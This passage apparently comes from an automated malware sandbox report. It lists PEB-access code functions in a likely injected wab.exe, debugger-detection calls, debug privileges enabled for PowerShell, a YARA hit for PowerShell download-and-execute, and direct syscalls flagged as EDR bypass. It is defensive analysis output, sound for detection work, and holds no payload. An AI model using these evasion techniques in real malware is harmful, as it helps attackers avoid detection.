Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]	26_2_21C7758F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82582 mov eax, dword ptr fs:[00000030h]	26_2_21C82582
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C82582 mov ecx, dword ptr fs:[00000030h]	26_2_21C82582
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE59C mov eax, dword ptr fs:[00000030h]	26_2_21CBE59C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]	26_2_21CA15A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]	26_2_21D135BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F5BE mov eax, dword ptr fs:[00000030h]	26_2_21D3F5BE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]	26_2_21D005A7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]	26_2_21CA45B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]	26_2_21CA45B1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]	26_2_21C88550
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]	26_2_21C88550
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]	26_2_21CB656A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B562 mov eax, dword ptr fs:[00000030h]	26_2_21C7B562
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]	26_2_21CBB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]	26_2_21CBB570
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7505 mov eax, dword ptr fs:[00000030h]	26_2_21CB7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB7505 mov ecx, dword ptr fs:[00000030h]	26_2_21CB7505
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]	26_2_21D54500
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D55537 mov eax, dword ptr fs:[00000030h]	26_2_21D55537
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]	26_2_21D2F525
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]	26_2_21CBD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBD530 mov eax, dword ptr fs:[00000030h]	26_2_21CBD530
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3B52F mov eax, dword ptr fs:[00000030h]	26_2_21D3B52F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8D534 mov eax, dword ptr fs:[00000030h]	26_2_21C8D534
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C90535 mov eax, dword ptr fs:[00000030h]	26_2_21C90535
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D554DB mov eax, dword ptr fs:[00000030h]	26_2_21D554DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C804E5 mov ecx, dword ptr fs:[00000030h]	26_2_21C804E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B480 mov eax, dword ptr fs:[00000030h]	26_2_21C7B480
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]	26_2_21C89486
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C89486 mov eax, dword ptr fs:[00000030h]	26_2_21C89486
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C864AB mov eax, dword ptr fs:[00000030h]	26_2_21C864AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB34B0 mov eax, dword ptr fs:[00000030h]	26_2_21CB34B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB44B0 mov ecx, dword ptr fs:[00000030h]	26_2_21CB44B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F453 mov eax, dword ptr fs:[00000030h]	26_2_21D3F453
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C8B440 mov eax, dword ptr fs:[00000030h]	26_2_21C8B440
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CBE443 mov eax, dword ptr fs:[00000030h]	26_2_21CBE443
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA245A mov eax, dword ptr fs:[00000030h]	26_2_21CA245A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7645D mov eax, dword ptr fs:[00000030h]	26_2_21C7645D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C81460 mov eax, dword ptr fs:[00000030h]	26_2_21C81460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C9F460 mov eax, dword ptr fs:[00000030h]	26_2_21C9F460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D5547F mov eax, dword ptr fs:[00000030h]	26_2_21D5547F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0C460 mov ecx, dword ptr fs:[00000030h]	26_2_21D0C460
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAA470 mov eax, dword ptr fs:[00000030h]	26_2_21CAA470
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D07410 mov eax, dword ptr fs:[00000030h]	26_2_21D07410
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA340D mov eax, dword ptr fs:[00000030h]	26_2_21CA340D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB8402 mov eax, dword ptr fs:[00000030h]	26_2_21CB8402
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7C427 mov eax, dword ptr fs:[00000030h]	26_2_21C7C427
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7E420 mov eax, dword ptr fs:[00000030h]	26_2_21C7E420
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C857C0 mov eax, dword ptr fs:[00000030h]	26_2_21C857C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D007C3 mov eax, dword ptr fs:[00000030h]	26_2_21D007C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C817EC mov eax, dword ptr fs:[00000030h]	26_2_21C817EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CA27ED mov eax, dword ptr fs:[00000030h]	26_2_21CA27ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0E7E1 mov eax, dword ptr fs:[00000030h]	26_2_21D0E7E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]	26_2_21C847FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C847FB mov eax, dword ptr fs:[00000030h]	26_2_21C847FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D3F78A mov eax, dword ptr fs:[00000030h]	26_2_21D3F78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D537B6 mov eax, dword ptr fs:[00000030h]	26_2_21D537B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C807AF mov eax, dword ptr fs:[00000030h]	26_2_21C807AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D097A9 mov eax, dword ptr fs:[00000030h]	26_2_21D097A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CAD7B0 mov eax, dword ptr fs:[00000030h]	26_2_21CAD7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7F7BA mov eax, dword ptr fs:[00000030h]	26_2_21C7F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0F7AF mov eax, dword ptr fs:[00000030h]	26_2_21D0F7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D04755 mov eax, dword ptr fs:[00000030h]	26_2_21D04755
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov esi, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CB674D mov eax, dword ptr fs:[00000030h]	26_2_21CB674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C93740 mov eax, dword ptr fs:[00000030h]	26_2_21C93740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D0E75D mov eax, dword ptr fs:[00000030h]	26_2_21D0E75D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C80750 mov eax, dword ptr fs:[00000030h]	26_2_21C80750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21D53749 mov eax, dword ptr fs:[00000030h]	26_2_21D53749
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]	26_2_21CC2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21CC2750 mov eax, dword ptr fs:[00000030h]	26_2_21CC2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 26_2_21C7B765 mov eax, dword ptr fs:[00000030h]	26_2_21C7B765

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D7724E GetProcessHeap,

10_2_23D7724E

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_23D72B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_23D72639
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_23D760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_23D760E2

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7616.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5288.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtTerminateThread: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtTerminateProcess: Direct from: 0x76F02D5C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C
